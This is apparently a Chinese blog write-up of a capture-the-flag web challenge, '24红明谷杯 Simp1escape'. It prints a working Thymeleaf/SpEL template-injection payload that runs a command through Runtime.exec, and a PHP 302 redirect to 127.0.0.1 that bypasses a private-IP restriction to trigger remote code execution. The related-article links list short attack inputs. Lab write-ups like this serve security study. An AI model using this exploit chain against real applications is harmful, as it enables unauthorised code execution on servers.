24红明谷杯-web-Simp1escape

原创 已于 2024-04-03 18:30:43 修改 · 523 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2024-04-03 18:29:26 首次发布
文章讲述了在比赛环境中,通过分析代码中的/curl和/getsites路由,利用HTML文件注入实现模板注入,进而利用服务器对127.0.0.1的限制,通过PHP脚本实现命令执行(RCE)漏洞。作者展示了如何在VPS上存储payload并触发漏洞的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

赛后才看的这道题,不知道跟赛题环境有没有区别。

代码分析

有两个有用的路由,/curl和/getsites,/curl用于请求非私有url并将内容保存至resources/sites/目录,/getsites可以加载模版,但是有限制必须是从127.0.0.1访问才行。
到这里其实思路很明显,上传html文件打模版注入,利用跳转绕过私有ip限制触发漏洞。
在这里插入图片描述
在这里插入图片描述

利用

将文件保存在vps上。
payload

[[${springMacroRequestContext.webApplicationContext.beanFactory.createBean(springMacroRequestContext.webApplicationContext.classLoader.loadClass('org.springframework.expression.spel.standard.SpelExpressionParser')).parseExpression("T(java.lang.Runtime).getRuntime().exec('open -a qq')").getValue()}]]

302

<?php
 header("Location:http://127.0.0.1:8080/getsites?hostname=ip"); 
?>

此时会生成一个以自己ip命名的html文件。
在这里插入图片描述
利用跳转触发漏洞后rce。
在这里插入图片描述

ARCHER359
关注
2023明谷部分WP
就这样吧
04-21 1414
2023明谷部分WP
明谷数据安全大赛 技能场景赛 部分wp
Alanpipi*的博客
04-03 5163
欢迎使用Markdown编辑器 新的改变 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 Markdown文章功能; 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间; 增加了 检查
明谷----阿尼亚
qq_51233573的博客
05-15 412
010打开图片一串数字,当时zsteg扫出来了但是没深入分析。赛后跟其他师傅交流说可以爆破找了一个在线进行乱码恢复的。根据图片的名字可以搜到这个在线解码图片的网站。猫哥出的题,比赛时没做出来后面做出来了。根据之前得到的密码解密出加密的内容。再转一次发现得到一段乱码。得到密码为 简单的编码。解密得到最后的flag。
2023 明谷 --- Crypto It Takes Two! wp
3tefanie的博客
04-23 963
【我认为真正的爱情应该是一种小型共产主义,我是奉献但不是付出,能够不把奉献看成付出,不计较得失,便不会总是处于一种患得患失的心态,你我之间的爱情应当如此。】
明谷2024Web方向)
Zue3r的博客
05-15 359
明谷2024Web方向)
[2022明谷]web题目复现
cosmoslin的博客
04-02 1356
Fan website 存在源码泄露,www.zip 审计代码,发现一个album路由,且有一个控制器module/Album/src/Controller/AlbumController.php,控制器能实现上传,删除等操作。 在上传部分可以看到过滤了 preg_match("/<\?|php|HALT\_COMPILER/i", $cont ) 从这里猜测应该是phar反序列化,那么我们还需要一个触发点,在文件删除操作调用了unlink函数 接下来就是找链子,由于提示了laminas组件,
第三届明谷CTF-【MISC】-阿尼亚
Keepb1ue的博客
04-19 2478
flag.zip需要解压密码,在图片中发现一串密文。一串乱码,尝试进行字符编码爆破。获取到密码:简单的编码。
应急响应练习——第五届明谷-异常行为溯源【手把手教学】
Lucky小小吴的小屋
05-15 440
应急响应练习——第五届明谷-异常行为溯源【手把手教学】 题目:在企业网络安全部门的溯源分析中,工作人员发现攻击者删除了部分访问日志,但通过流量监控设备捕获了被删除的日志数据。攻击者最初尝试低密度攻击,随后进行了连续多日的攻击。通过分析捕获的流量数据,发现大量Base64加密的请求包。经过连续两次Base64解码,提取出IP地址,并统计其出现次数。最终,定位到攻击者的IP地址为35.127.46.111,其MD5哈希值为flag{md5(IP)}。
2021明谷数据安全大赛技能场景赛-Writeup
末初 · mochu7
04-03 7182
文章目录Webwrite_shellhappysqleasytpjavawebMisc签到InputMonitor我的心是冰冰的歪比歪比babytraffic 后续题目知道怎么做了,跟进复现会把wp补上 Web write_shell 第一步主要考察PHP代码执行,第一步先写个phpinfo()看下情况。利用php的一种短标签可以绕过分号,然后拼接一下绕过php字样。 /?action=upload&data=<?=(p.hpinfo)()?> 沙盒路径?action=pwd
2022明谷web
羽的博客
03-24 1905
Fan website 题目给了提示,和laminas有关。 扫描目录得到源码。 审计代码发现题目有个album路由,并且控制器只有一个/module/Album/src/Controller/AlbumController.php 里面包含几个处理函数,可以上传文件,删除文件。 但是上传文件过滤是白名单所以不是很好绕过。 并且内容里面不能有<? HALT_COMPILER 这就有点此地无银三百两了,无缘无故为啥过滤和phar有关的HALT_COMPILER。 上网搜这个组件的漏洞发现了一个反序
【2024明谷】三道Web题目的记录
jayq1的博客
04-03 1452
三道Web题目的记录与分享,希望对师傅们有所帮助,有理解不当之处也希望师傅们及时指正,感恩!
[明谷]wp(正则注入,hex绕过)
Huamang的博客
04-03 859
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
2024明谷部分WP_netpixeljihad(1)
2401_83974064的博客
04-11 905
考虑一下使用后台设置栏目存在任意文件读取漏洞看看能不能读取flag点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
美创智能数据安全分类分级平台获“2025年网络安全优秀创新成果大赛”优胜奖!
美创科技的博客
08-14 398
美创智能数据安全分类分级平台,基于 AI 智能化技术,通过动态发现并精准识别对国家、组织和个人安全至关重要的各类分级数据,构建起高度贴合行业诉求的数据资产目录,有效满足数据安全合规及精细化安全防护的需求,其分类分级准确率更高达95%。平台全新上线「智能自检」功能,基于双 AI 模型协同校验机制,直击传统分类分级作业中人工复核效率低、分类分级质量难保证的痛点,让分类分级效率飙升至行业新高,更以逼近100%的精准率,让每一条数据的分级结果都经得起监管与业务的双重检验。
网络安全应急响应
鹿鸣天涯
08-14 970
logs/catalina.xx.log logs/host-manager.xx.log logs/localhost.xx.log logs/manager.xx.log 主要记录系统启、关闭日志、管理日志和异常信息。1)收集信息:操作系统版本,补丁,数据库版本,中间件/服务器,网络拓扑,受害范围,处置情况,提取日志(主机,安全设备,数据库等)1web入侵:挂马、网页篡改(博彩/黑帽SEO等)、植入webshell,黑页,暗链等。入侵现象:如cpu过高,勒索界面,异常网络链接,安全设备告警等。
网络的基本概念、通信原理以及网络安全问题
qq_73704268的博客
08-11 682
本文系统介绍了计算机网络的基础原理与安全机制。主要内容包括:1.网络本质是电压/电磁波信号传输,通过高低电平表示0/1数字信号;2.网络架构采用分层交换结构,家庭-交换机-核心交换机构成树状拓扑;3.网络通信依赖IP地址、MAC地址和端口号三重标识,通过校验码、超时重传等机制保障传输可靠性;4.网络协议作为通信规则,采用分层设计保证设备互联,但协议开放性带来安全风险;5.常见网络攻击包括监听、篡改、拦截和复制,其中协议层漏洞可能导致严重安全问题。文章重点分析了网络监听的技术原理和安全威胁,指出硬件层难以实现
医院网络安全重保方案
huluang的专栏
08-15 493
医院网络安全重保方案严格遵循《网络安全法》等国家标准,重点防护勒索软件和供应链攻击。方案构建基于零信任架构的动态防护体系,包括终端EDR防护、数据加密备份、网络分区隔离等措施,确保核心医疗系统RTO≤4小时。实施过程涵盖资产梳理、渗透测试、7×24小时监测等环节,并配套完善的交付文档体系。方案特别强调患者数据保护,要求数据库审计日志留存≥6个月,符合《个人信息保护法》要求。通过厂商驻场、应急演练等技术保障措施,实现攻击阻断率≥99%,全面满足三级等保要求,保障医院业务连续性。
网络安全和基础设施安全局 (CISA) 表示微分段不再是可选的
网络研究观
08-13 803
通过分阶段的方法和合适的工具,组织现在就可以踏上一条清晰的道路,迈向全面、有效的零信任环境。
Android 欧盟网络安全EN18031 要求对应的基本表格填写
最新发布
wenzhi的博客
08-15 847
摘要:本文介绍了欧盟网络安全标准EN 18031的相关背景及认证要求。该标准将于2025年8月1日正式实施,不符合要求的产品将无法进入欧盟市场。文章重点展示了一个EN 18031认证预填表格的示例,包含访问控制机制(ACM)和认证机制(AUM)两个核心模块的评估项,如设备是否实施访问控制措施、采用何种认证方式等。表格采用"是/否/不适用"的勾选形式,并设有备注栏说具体情况。对于厂商而言,通过专业机构认证是确认设备合规性的有效途径。
微软推出革命性AI安全工具Project IRE,重塑网络安全防御新范式
Bar_artist的博客
08-09 939
Project IRE AI代表了逆向工程领域的技术飞跃,它通过整合传统安全分析工具与前沿AI能力,构建了前所未有的恶意软件检测体系。作为微软安全生态系统的重要组成部分,Project IRE AI的推出象征着AI在网络安全领域的角色转变——从辅助工具升级为主动防御的核心力量,为自动化威胁检测设立了全新行业标准。Project IRE AI带来的不仅是技术升级,更是一场防御理念的革命:从被动响应到主动预防,AI正成为网络安全攻防战中最具决定性的战略要素。核心技术解析:AI驱动的逆向工程革命。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值